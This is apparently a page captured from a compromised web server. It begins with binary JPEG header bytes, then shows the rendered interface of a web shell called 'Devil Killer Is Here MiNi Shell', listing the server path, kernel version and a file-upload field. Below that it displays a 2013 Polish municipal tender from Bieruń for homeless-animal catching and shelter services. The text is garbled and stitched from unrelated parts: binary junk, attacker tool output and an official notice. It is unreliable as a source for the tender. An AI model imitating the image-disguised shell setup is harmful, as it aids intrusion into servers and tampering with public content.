JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130208/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130208/20541-N-2013.html

<p class="kh_header"><b>Bieruń: WYKONANIE KOMPLEKSOWEJ USŁUGI W ZAKRESIE OPIEKI NAD BEZDOMNYMI ZWIERZĘTAMI Z TERENU GMINY BIERUŃ</b><br>
<b>Numer ogłoszenia: 20541 - 2013; data zamieszczenia: 08.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE KOMPLEKSOWEJ USŁUGI W ZAKRESIE OPIEKI NAD BEZDOMNYMI ZWIERZĘTAMI Z TERENU GMINY BIERUŃ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  wykonanie kompleksowej usługi w zakresie opieki nad bezdomnymi zwierzętami polegającej na systematycznym, stałym i całodobowym:
    1) prowadzeniu we współpracy ze Strażą Miejską odłowu bezdomnych zwierząt i 
        umieszczeniu ich w miejscu przetrzymywania zwierząt (dopuszcza się, by miejscem tym 
        było schronisko dla bezdomnych zwierząt, usytuowane w odległości nie większej niż  
        120 km od granic gminy Bieruń) do czasu odnalezienia właściciela (opiekuna),  
        przekazania do adopcji lub schroniska (dot. szacunkowej ilości ok. 50 szt. wyłapanych  
        psów w skali całej umowy), W szczególnych przypadkach wyłapaniu podlegać będą 
        również bezdomne koty (np. chore, potrącone w wypadkach) które będą podlegały 
        sterylizacji a następnie będą wypuszczane w okolicy miejsca ich zabrania. Takich
        przypadków nie przewiduje się więcej jak 5 w skali roku. 
    2) odłów zwierząt winien nastąpić w czasie 6 godz. od powzięcia informacji o konieczności
        jego przeprowadzenia,
    3) zapewnienie stałego kontaktu telefonicznego oraz mailowego,
    4) prowadzenie ewidencji wyłapanych zwierząt oraz dokumentacji fotograficznej                     
        i przekazywanie jej na bieżąco zamawiającemu (w cyklach jednomiesięcznych), 
        ewidencja nie będzie obejmowała zwierząt, względem których zostanie ustalony 
        właściciel,
    5) zapewnieniu wyżywienia (w tym zakupu karmy) i opieki wyłapanym zwierzętom,
    6) prowadzeniu działań zmierzających do odnalezienia właściciela (opiekuna) zwierzęcia 
        m.in. poprzez umieszczanie ogłoszeń w mediach o znalezionych zwierzętach oraz 
        zwierzętach przeznaczonych do adopcji,
    7) w wyniku bezskutecznych działań opisanych w pkt 6, przygotowywanie adopcji  
        i przekazanie zwierząt nowym właścicielom; przekazywanie bezdomnych zwierząt do 
        rodzin adopcyjnych następować będzie na podstawie pisemnych umów adopcyjnych 
        zawartych pomiędzy wykonawcą a osobami, podmiotami adoptującymi,
    8) zapewnieniu zwierzętom opieki weterynaryjnej, w skład której wchodzą kontrola stanu 
        zdrowia, profilaktyka zwalczanie pasożytów wewnętrznych i zewnętrznych                               
        i w uzasadnionych przypadkach leczenie, założenie książki kontroli weterynaryjnej 
        dokumentującej przeprowadzone czynności weterynaryjne wraz z poświadczeniem 
        wykonania tych czynności przez lekarza weterynarii: w uzasadnionych przypadkach 
        organizowanie i pośredniczenie w 15 dniowej kwarantannie, eutanazja zwierzęcia, 
        zapewnienie opieki weterynaryjnej zwierzętom rannym w wypadkach komunikacyjnych,
    9) organizowaniu obserwacji zwierząt podejrzanych o wściekliznę.
Informacje uzupełniające dotyczące wykonania zamówienia zostały również zawarte               w projekcie umowy, stanowiącej załącznik do SIWZ.
Zamawiający nie przewiduje: zawarcia umowy ramowej, aukcji elektronicznej, dynamicznego systemu zakupów, udzielania zaliczek na poczet wykonania umowy, stosowania wymagań, o których mowa w art.   29 ust. 4 ustawy  pzp. 
Zamawiający nie dopuszcza składania ofert częściowych, wariantowych.
Zamawiający przewiduje udzielenie zamówień uzupełniających, polegających na powtórzeniu tego samego rodzaju zamówień, w przypadku pozyskania dodatkowych środków finansowych na jego  realizację .
  Kod Wspólnego Słownika Zamówień (CPV) : 
          98380000-0 Usługi psiarni 
          85200000-1  Usługi weterynaryjne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, polegających na powtórzeniu tego samego rodzaju zamówień, w przypadku pozyskania dodatkowych środków finansowych na jego  realizację .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.38.00.00-0, 85.20.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie stosuje się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
       Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na 
       podstawie przedłożonego przez wykonawcę : 
       - oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
       W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  
       wykazać, że warunek spełnia przynajmniej jeden z wykonawców lub wykonawcy  
       spełniają go łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Posiadają wiedzę i doświadczenie : 
 Wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługę/usługi  o łącznej wartości brutto min. 70 000,00 zł w zakresie stanowiącym przedmiot zamówienia  tj. co najmniej  usługę wyłapywania bezdomnych zwierząt i całodobowej opieki nad bezdomnymi zwierzętami,  zgodnie z przepisami prawa określonymi  w :
-	Ustawie z dn. 21.08.1997 r. o ochronie zwierząt (Dz. U. Nr 1 11, poz.724 ze zm.),
-	Rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dn. 26.08.1998 r. w sprawie zasad i warunków wyłapywania bezdomnych zwierząt (Dz. U. Nr 116, poz.753 ze zm.)
-	Rozporządzeniu Ministra Rolnictwa i Gospodarki Żywnościowej z dn. 21.01.1999 r.  w  sprawie szczegółowych warunków weterynaryjnych wymaganych przy organizowaniu lub  urządzaniu targów, spędów i wystaw zwierząt oraz prowadzeniu schronisk dla zwierząt (Dz. U. Nr 9, poz. 84 ze zm.),
-	Ustawie o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2005 r. nr 236, poz. 2008 ze zm.)

Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na   
podstawie przedłożonego przez wykonawcę:
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 2 ustawy pzp)
-	wykazu wykonanych w/w usług z podaniem ich wartości, przedmiotu, dat wykonania         i odbiorców oraz załączeniem dokumentu (np. referencji) potwierdzającego, że usługi te zostały wykonane należycie.
       W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  
       wykazać, że warunek spełnia przynajmniej jeden z wykonawców lub wykonawcy    
       spełniają go łącznie tzn. mimo iż jeden z wykonawców występując samodzielnie nie 
       mógłby ubiegać się  o udzielenie zamówienia, ale występując wspólnie wykonawcy 
       uzupełniając się wykonali  wymagane warunki   np. jeden z wykonawców zajmował  
       się wychwytywaniem bezdomnych zwierząt, a drugi prowadził schronisko w zakresie 
       całodobowej opieki nad bezdomnymi zwierzętami. 
       
Przez wykonali  rozumie się, że usługi zostały wykonane należycie  i potwierdzone przez podmiot zamawiający.
W przypadku usług nadal wykonywanych (umów nie zakończonych np. z terminem realizacji w latach 2012-2014) dla spełnienia warunków należy wykazać wartość usług należycie  wykonanych i odebranych/ potwierdzonych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia tj. 
minimum:
a) samochodem przystosowanym do przewozu wychwytanych zwierząt skonstruowany, 
    utrzymywany oraz działający w sposób pozwalający zapobiec zranieniu i cierpieniu 
    oraz w sposób zapewniający bezpieczeństwo zwierząt w czasie transportu (zgodnie 
    z rozporządzeniem Rady (WP) nr I/2005 z dnia 22 grudnia 2004 r. w sprawie 
    ochrony zwierząt podczas transportu i związanych z tym działań),
b) sprzętem odpowiednim do odłowu  zwierząt w tym: 
     1) siatka do wyłapywania zwierząt 1 szt.,
     2) chwytak automatyczny na psy 1 szt.,
     3) klatka do przewozu psów 1 szt.,
     4) klatka do łapania małych zwierząt 1 szt.,
     5) pętla do łapania i prowadzenia małych zwierząt 1 szt.
     6) klatka do transportu małych zwierząt 1 szt.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp),
- dokumentu : wykazu w/w  narzędzi , wyposażenia zakładu i urządzeń   
  technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z  
  informacją  o podstawie dysponowania tymi zasobami.
       W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  
       wykazać, że warunek spełnia przynajmniej jeden z wykonawców lub wykonawcy  
       spełniają go łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia tzn.
       dysponują minimum 1 osobą posiadającą prawo wykonywania zawodu lekarza weterynarii, która będzie uczestniczyć w wykonaniu zamówienia.
       Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie przedłożonego przez wykonawcę:
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp)
-	dokumentu: wykazu osób, które będą uczestniczyć w wykonaniu zamówienia,                               wraz informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją  o podstawie do dysponowania tymi osobami.   
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy 
wykazać, że warunek spełnia przynajmniej jeden z wykonawców .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia:.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie   przedłożonego przez wykonawcę :
        - oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca przystępujący do postępowania złoży następujące oświadczenia:
Oświadczenie z art. 22 ust. 1 ustawy pzp, że :
1.	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	posiada wiedzę i doświadczenie do wykonania zamówienia; 
3.	dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4.	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie     zamówienia.
 Oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii.
1)	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
       dostarcza oświadczenia i dokumenty wymienione w pkt. Lista wymaganych oświadczeń   
       oraz  w pkt. Lista wymaganych dokumentów.
       Zamiast dokumentu, o którym mowa w pkt  4 -  Listy wymaganych dokumentów, 
       przedstawia dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub
       miejsce zamieszkania, potwierdzające odpowiednio, że:
       a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
Dokument, o których mowa powyżej,  powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem, przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub  miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
       Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentów, o których mowa 
       w punkcie 1a niniejszej uwagi.
2) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język  
    polski.
3) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz                        w przypadku podmiotów, o których mowa w § 1 ust. 2 i 3 w/w rozporządzenia, kopie         dokumentów dotyczących odpowiednio wykonawcy lub podmiotów są poświadczane za         zgodność z oryginałem przez wykonawcę lub te podmioty.
4) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach
     zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,
     niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej
     sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami
     niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu
     pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych
     zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
     Obowiązkiem wykonawcy w przypadku, gdy korzysta z potencjałów podmiotów trzecich, jest rzeczywiste wykazanie, że tym potencjałem będzie dysponował.        
     Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać:
         -  kto jest podmiotem przyjmującym zasoby,
         -  zakres zobowiązania podmiotu trzeciego,
         -  czego dotyczy zobowiązanie,
         -  w jaki sposób będzie zobowiązanie wykonane,
         -  jakiego okresu dotyczy zobowiązanie.
     5) Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów     dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego warunku.
     6) Podmioty występujące wspólnie
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum/spółki cywilnej) do oferty należy dołączyć : 
a)	Pełnomocnictwo  określające zasady reprezentacji ze wskazaniem pełnomocnika ( lidera),  jego zakresu działania  i   uprawnień do reprezentowania wykonawców w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. 
Pełnomocnictwo  winno zawierać, w szczególności  :
- nazwy wszystkich wykonawców  wspólnie ubiegający się o realizację  zamówienia  
i   udzielających pełnomocnictwa, 
- 	nazwę firmy Pełnomocnika/Lidera,
- zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy, 
- 	czas trwania ( zawiązania umowy wykonawców wspólnie ubiegających się o udzielenie zamówienia tzn. co najmniej okres obejmujący realizację zamówienia),
- 	cel zawarcia ( wspólne przystąpienie do przetargu i wspólna realizacja zamówienia publicznego),
-	datę udzielenia pełnomocnictwa,
-  podpisy wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,  zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem / Liderem. 
b)	Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby    warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie.
c)	Dokumenty  wymienione w pkt. V B ppkt. 1,2,3  Listy dokumentów  powinny być złożone w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie.
d)	Dokumenty wymienione w pkt. V B ppkt.4 i 5 Listy dokumentów składa każdy z wykonawców wchodzących w skład podmiotu występującego wspólnie.
e)	Kopie dokumentów dotyczących wykonawcy powinny być poświadczane za zgodność  z  oryginałem  przez wykonawcę, którego dokument dotyczy lub przez lidera lub przez  wszystkich  wykonawców   wchodzących w skład tego podmiotu.
f)	Zgodnie z art. 141 ustawy pzp, wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.
g)	Wszelka korespondencja będzie prowadzona z liderem konsorcjum.
Do oferty zaleca się załączyć informacje  w zakresie części zamówienia, które zostaną  
           powierzone podwykonawcom. W przypadku braku złożenia informacji w tym zakresie,    
           zamawiający uzna, że wykonawca wykona całość zamówienia sam bez powierzenia  
           części zamówienia podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany zawartej z Wykonawcą umowy w zakresie:
a. wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie z obowiązującą  
     stawką;
b. terminu realizacji (przedłużenia terminu)  w przypadku niewykorzystania pełnej wartości umowy jednak nie  
    dłużej niż do 31.12.2013 r. 
